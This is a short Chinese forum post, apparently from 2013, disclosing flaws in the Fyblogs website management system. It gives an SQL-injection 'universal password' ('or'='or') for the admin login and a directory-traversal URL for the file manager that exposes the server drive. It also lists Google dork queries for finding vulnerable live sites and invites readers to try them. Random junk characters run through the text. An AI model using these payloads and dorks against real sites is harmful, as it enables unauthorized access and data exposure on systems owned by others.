漏洞类型: 未授权访问/权限绕过
. a6 Q: [4 W8 o8 `. O E
% O7 B2 Q/ g1 J8 G简要描述:
. g3 Y3 h! R8 T* E8 L' s# A( ^: f6 l, o0 y! T: G' G7 G
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!6 S+ Y5 m& s# l3 I/ ^0 C* c8 a6 H
7 z9 M+ K( U' R( [6 w
详细说明:
6 b* D( _8 w1 I, ~! i3 S, _# l; a M, n# Z" `
后台万能密码 'or'='or'
D T9 r! n' Z后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
5 x H! Q8 v8 k, k, g! dadmin/uploadfile.asp?currentFolder=/upfiles/../) l' Z1 {3 a1 V1 {! h$ q
7 H; R! p* b5 Q( x `" l漏洞证明:4 {6 G' Q6 I7 l+ I0 G
- k/ ]4 ]8 W4 i
谷歌:inurl:type.asp?id=1 新闻中心
T) @4 ?: Y/ X. ~或者 :inurl:download_ok.asp?5 G. }8 H, I0 ?* v# O, ^ Q9 Z
& h* u& N H+ k8 f: ^. }
可以测试
! Z0 ~! P' o8 N6 k9 b
, F" ]" ?( Z' H& Q/ C' l
& G& k. R. Y0 w. a! \3 Q2 W |
发表于 2013-3-7 13:07:46
收藏
支持
反对